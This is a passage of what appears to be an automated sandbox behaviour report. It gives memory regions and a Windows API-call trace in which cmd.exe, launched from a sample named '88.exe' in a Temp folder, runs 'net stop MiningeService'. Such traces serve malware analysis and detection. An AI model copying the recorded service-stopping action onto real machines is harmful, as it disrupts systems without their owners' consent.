"\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 5334 start_va = 0x776e0000 end_va = 0x777fefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000776e0000" filename = "" Region: id = 5335 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 0 entry_point = 0x775fa2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 5336 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000775e0000" filename = "" Region: id = 5337 start_va = 0x590000 end_va = 0x80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 5338 start_va = 0x769b0000 end_va = 0x76abffff monitored = 0 entry_point = 0x769c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 5339 start_va = 0x76fe0000 end_va = 0x77026fff monitored = 0 entry_point = 0x76fe74c1 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 5341 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 5342 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 5343 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 5431 start_va = 0x20000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 5432 start_va = 0x70000 end_va = 0xd6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5433 start_va = 0x76cc0000 end_va = 0x76d6bfff monitored = 0 entry_point = 0x76cca472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 5434 start_va = 0x75400000 end_va = 0x75406fff monitored = 0 entry_point = 0x75401230 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\SysWOW64\\winbrand.dll" (normalized: "c:\\windows\\syswow64\\winbrand.dll") Region: id = 5435 start_va = 0x773b0000 end_va = 0x774affff monitored = 0 entry_point = 0x773cb6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 5436 start_va = 0x77240000 end_va = 0x772cffff monitored = 0 entry_point = 0x77256343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 5437 start_va = 0x75780000 end_va = 0x75789fff monitored = 0 entry_point = 0x757836a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 5438 start_va = 0x76ac0000 end_va = 0x76b5cfff monitored = 0 entry_point = 0x76af3fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 5439 start_va = 0x76c20000 end_va = 0x76cbffff monitored = 0 entry_point = 0x76c349e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 5440 start_va = 0x76900000 end_va = 0x76918fff monitored = 0 entry_point = 0x76904975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 5441 start_va = 0x75bc0000 end_va = 0x75caffff monitored = 0 entry_point = 0x75bd0569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 5442 start_va = 0x75530000 end_va = 0x7558ffff monitored = 0 entry_point = 0x7554a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 5443 start_va = 0x75520000 end_va = 0x7552bfff monitored = 0 entry_point = 0x755210e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 5444 start_va = 0x150000 end_va = 0x22ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 5445 start_va = 0xe0000 end_va = 0xfdfff monitored = 0 entry_point = 0xf158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 5446 start_va = 0x810000 end_va = 0x997fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000810000" filename = "" Region: id = 5447 start_va = 0xe0000 end_va = 0xfdfff monitored = 0 entry_point = 0xf158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 5448 start_va = 0x76b90000 end_va = 0x76beffff monitored = 0 entry_point = 0x76ba158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 5449 start_va = 0x774b0000 end_va = 0x7757bfff monitored = 0 entry_point = 0x774b168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 5451 start_va = 0x9a0000 end_va = 0xb20fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009a0000" filename = "" Region: id = 5452 start_va = 0xb30000 end_va = 0x1f2ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b30000" filename = "" Region: id = 5453 start_va = 0xe0000 end_va = 0xfffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "cmd.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\cmd.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\cmd.exe.mui") Region: id = 5466 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 5467 start_va = 0x100000 end_va = 0x100fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 5478 start_va = 0x1f30000 end_va = 0x21fefff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 208 os_tid = 0xcec [0265.847] GetProcAddress (hModule=0x769b0000, lpProcName="SetConsoleInputExeNameW") returned 0x769da775 [0265.848] GetProcessHeap () returned 0x710000 [0265.848] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0x400a) returned 0x7258d0 [0265.848] GetProcessHeap () returned 0x710000 [0265.849] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x7258d0 | out: hHeap=0x710000) returned 1 [0265.849] _wcsicmp (_String1="net", _String2=")") returned 69 [0265.849] _wcsicmp (_String1="FOR", _String2="net") returned -8 [0265.849] _wcsicmp (_String1="FOR/?", _String2="net") returned -8 [0265.849] _wcsicmp (_String1="IF", _String2="net") returned -5 [0265.849] _wcsicmp (_String1="IF/?", _String2="net") returned -5 [0265.849] _wcsicmp (_String1="REM", _String2="net") returned 4 [0265.849] _wcsicmp (_String1="REM/?", _String2="net") returned 4 [0265.849] GetProcessHeap () returned 0x710000 [0265.849] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0x58) returned 0x7230a0 [0265.849] GetProcessHeap () returned 0x710000 [0265.849] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0x10) returned 0x720038 [0265.850] GetProcessHeap () returned 0x710000 [0265.850] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0x32) returned 0x723100 [0265.851] GetConsoleTitleW (in: lpConsoleTitle=0x38f560, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\88.exe") returned 0x2b [0265.851] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0265.852] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0265.852] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0265.852] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0265.852] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0265.852] _wcsicmp (_String1="net", _String2="CD") returned 11 [0265.852] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0265.852] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0265.852] _wcsicmp (_String1="net", _String2="REN") returned -4 [0265.852] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0265.852] _wcsicmp (_String1="net", _String2="SET") returned -5 [0265.852] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0265.852] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0265.852] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0265.852] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0265.852] _wcsicmp (_String1="net", _String2="MD") returned 1 [0265.852] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0265.852] _wcsicmp (_String1="net", _String2="RD") returned -4 [0265.852] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0265.852] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0265.852] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0265.852] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0265.852] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0265.852] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0265.852] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0265.852] _wcsicmp (_String1="net", _String2="VER") returned -8 [0265.852] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0265.853] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0265.853] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0265.853] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0265.853] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0265.853] _wcsicmp (_String1="net", _String2="START") returned -5 [0265.853] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0265.853] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0265.853] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0265.853] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0265.853] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0265.853] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0265.853] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0265.853] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0265.853] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0265.853] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0265.853] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0265.853] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0265.853] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0265.853] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0265.853] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0265.853] _wcsicmp (_String1="net", _String2="CD") returned 11 [0265.853] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0265.853] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0265.853] _wcsicmp (_String1="net", _String2="REN") returned -4 [0265.854] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0265.854] _wcsicmp (_String1="net", _String2="SET") returned -5 [0265.854] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0265.854] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0265.854] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0265.854] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0265.854] _wcsicmp (_String1="net", _String2="MD") returned 1 [0265.854] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0265.854] _wcsicmp (_String1="net", _String2="RD") returned -4 [0265.854] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0265.854] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0265.854] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0265.854] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0265.854] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0265.854] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0265.854] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0265.854] _wcsicmp (_String1="net", _String2="VER") returned -8 [0265.854] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0265.854] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0265.854] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0265.854] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0265.854] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0265.854] _wcsicmp (_String1="net", _String2="START") returned -5 [0265.854] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0265.854] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0265.854] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0265.855] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0265.855] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0265.855] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0265.855] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0265.855] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0265.855] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0265.855] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0265.855] _wcsicmp (_String1="net", _String2="FOR") returned 8 [0265.855] _wcsicmp (_String1="net", _String2="IF") returned 5 [0265.855] _wcsicmp (_String1="net", _String2="REM") returned -4 [0265.855] GetProcessHeap () returned 0x710000 [0265.855] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0x210) returned 0x723140 [0265.855] GetProcessHeap () returned 0x710000 [0265.855] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0x3a) returned 0x723358 [0265.855] _wcsnicmp (_String1="net", _String2="cmd ", _MaxCount=0x4) returned 11 [0265.856] GetProcessHeap () returned 0x710000 [0265.856] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0x418) returned 0x7107f0 [0265.856] SetErrorMode (uMode=0x0) returned 0x8001 [0265.856] SetErrorMode (uMode=0x1) returned 0x0 [0265.856] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x7107f8, lpFilePart=0x38f080 | out: lpBuffer="C:\\Windows", lpFilePart=0x38f080*="Windows") returned 0xa [0265.856] SetErrorMode (uMode=0x8001) returned 0x1 [0265.856] GetProcessHeap () returned 0x710000 [0265.856] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x7107f0, Size=0x26) returned 0x7107f0 [0265.856] GetProcessHeap () returned 0x710000 [0265.856] RtlSizeHeap (HeapHandle=0x710000, Flags=0x0, MemoryPointer=0x7107f0) returned 0x26 [0265.856] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a480640, nSize=0x2000 | out: lpBuffer="") returned 0x8f [0265.856] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0265.856] GetProcessHeap () returned 0x710000 [0265.856] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0x142) returned 0x7233a0 [0265.856] GetProcessHeap () returned 0x710000 [0265.856] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0x27c) returned 0x710820 [0265.963] GetProcessHeap () returned 0x710000 [0265.963] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x710820, Size=0x144) returned 0x710820 [0265.963] GetProcessHeap () returned 0x710000 [0265.963] RtlSizeHeap (HeapHandle=0x710000, Flags=0x0, MemoryPointer=0x710820) returned 0x144 [0265.963] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a480640, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0265.963] GetProcessHeap () returned 0x710000 [0265.963] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0xe0) returned 0x7234f0 [0265.964] GetProcessHeap () returned 0x710000 [0265.964] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x7234f0, Size=0x76) returned 0x7234f0 [0265.964] GetProcessHeap () returned 0x710000 [0265.964] RtlSizeHeap (HeapHandle=0x710000, Flags=0x0, MemoryPointer=0x7234f0) returned 0x76 [0266.117] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0266.117] FindFirstFileExW (in: lpFileName="C:\\Windows\\net.*", fInfoLevelId=0x1, lpFindFileData=0x38edfc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x38edfc) returned 0xffffffff [0266.118] GetLastError () returned 0x2 [0266.118] FindFirstFileExW (in: lpFileName="C:\\Windows\\net", fInfoLevelId=0x1, lpFindFileData=0x38edfc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x38edfc) returned 0xffffffff [0266.118] GetLastError () returned 0x2 [0266.118] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0266.118] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x38edfc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x38edfc) returned 0x723570 [0266.119] GetProcessHeap () returned 0x710000 [0266.119] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x14) returned 0x7235b0 [0266.119] FindClose (in: hFindFile=0x723570 | out: hFindFile=0x723570) returned 1 [0266.119] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x38edfc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x38edfc) returned 0xffffffff [0266.119] GetLastError () returned 0x2 [0266.120] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x38edfc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x38edfc) returned 0x723570 [0266.120] GetProcessHeap () returned 0x710000 [0266.120] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x7235b0, Size=0x4) returned 0x7235b0 [0266.120] FindClose (in: hFindFile=0x723570 | out: hFindFile=0x723570) returned 1 [0266.120] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0266.120] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0266.120] GetConsoleTitleW (in: lpConsoleTitle=0x38f2f4, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\88.exe") returned 0x2b [0266.120] InitializeProcThreadAttributeList (in: lpAttributeList=0x38f17c, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x38f244 | out: lpAttributeList=0x38f17c, lpSize=0x38f244) returned 1 [0266.120] UpdateProcThreadAttribute (in: lpAttributeList=0x38f17c, dwFlags=0x0, Attribute=0x60001, lpValue=0x38f23c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x38f17c, lpPreviousValue=0x0) returned 1 [0266.120] GetStartupInfoW (in: lpStartupInfo=0x38f138 | out: lpStartupInfo=0x38f138*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\88.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x101, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x214, hStdOutput=0x20c, hStdError=0x20c)) [0266.120] GetProcessHeap () returned 0x710000 [0266.121] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0x18) returned 0x723570 [0266.121] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0266.121] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0266.121] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0266.121] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0266.121] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0266.121] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0266.121] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0266.121] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0266.121] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0266.121] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0266.121] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0266.121] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0266.121] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0266.121] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0266.121] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0266.121] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0266.121] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0266.121] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0266.121] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0266.121] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0266.121] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0266.121] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0266.121] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0266.121] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0266.121] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0266.121] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0266.121] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0266.121] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0266.121] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0266.121] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0266.122] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0266.122] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0266.122] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0266.122] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0266.122] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0266.122] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0266.122] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0266.122] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0266.122] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0266.122] GetProcessHeap () returned 0x710000 [0266.122] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x723570 | out: hHeap=0x710000) returned 1 [0266.122] GetProcessHeap () returned 0x710000 [0266.122] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0xa) returned 0x720050 [0266.122] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0266.125] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop MiningeService", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows", lpStartupInfo=0x38f1d8*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop MiningeService", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x38f224 | out: lpCommandLine="net stop MiningeService", lpProcessInformation=0x38f224*(hProcess=0x84, hThread=0x80, dwProcessId=0xd24, dwThreadId=0x550)) returned 1 [0266.154] CloseHandle (hObject=0x80) returned 1 [0266.154] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0266.154] GetProcessHeap () returned 0x710000 [0266.154] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x724d80 | out: hHeap=0x710000) returned 1 [0266.154] GetEnvironmentStringsW () returned 0x724230* [0266.154] GetProcessHeap () returned 0x710000 [0266.154] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0xb44) returned 0x724d80 [0266.154] FreeEnvironmentStringsW (penv=0x724230) returned 1 [0266.154] WaitForSingleObject (hHandle=0x84, dwMilliseconds=0xffffffff) returned 0x0 [0270.465] GetExitCodeProcess (in: hProcess=0x84, lpExitCode=0x38f118 | out: lpExitCode=0x38f118*=0x2) returned 1 [0270.465] CloseHandle (hObject=0x84) returned 1 [0270.466] _vsnwprintf (in: _Buffer=0x38f260, _BufferCount=0x13, _Format="%08X", _ArgList=0x38f124 | out: _Buffer="00000002") returned 8 [0270.466] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0270.466] GetProcessHeap () returned 0x710000 [0270.466] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x724d80 | out: hHeap=0x710000) returned 1 [0270.467] GetEnvironmentStringsW () returned 0x724230* [0270.467] GetProcessHeap () returned 0x710000 [0270.467] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0xb6a) returned 0x728448 [0270.467] FreeEnvironmentStringsW (penv=0x724230) returned 1 [0270.467] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0270.467] GetProcessHeap () returned 0x710000 [0270.467] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x728448 | out: hHeap=0x710000) returned 1 [0270.467] GetEnvironmentStringsW () returned 0x724230* [0270.467] GetProcessHeap () returned 0x710000 [0270.467] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0xb6a) returned 0x728448 [0270.467] FreeEnvironmentStringsW (penv=0x724230) returned 1 [0270.468] GetProcessHeap () returned 0x710000 [0270.468] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x720050 | out: hHeap=0x710000) returned 1 [0270.468] DeleteProcThreadAttributeList (in: lpAttributeList=0x38f17c | out: lpAttributeList=0x38f17c) [0270.468] _get_osfhandle (_FileHandle=1) returned 0x20c [0270.468] SetConsoleMode (hConsoleHandle=0x20c, dwMode=0x0) returned 0 [0270.468] _get_osfhandle (_FileHandle=1) returned 0x20c [0270.468] GetConsoleMode (in: hConsoleHandle=0x20c, lpMode=0x4a4741ac | out: lpMode=0x4a4741ac) returned 0 [0270.468] _get_osfhandle (_FileHandle=0) returned 0x214 [0270.468] GetConsoleMode (in: hConsoleHandle=0x214, lpMode=0x4a4741b0 | out: lpMode=0x4a4741b0) returned 0 [0270.468] GetConsoleOutputCP () returned 0x1b5 [0270.469] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a474260 | out: lpCPInfo=0x4a474260) returned 1 [0270.469] SetThreadUILanguage (LangId=0x0) returned 0x409 [0270.469] exit (_Code=2) Process: id = "20" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x63030000" os_pid = "0xd24" os_integrity_level = "0x3000" os_privileges = "0x60800000" 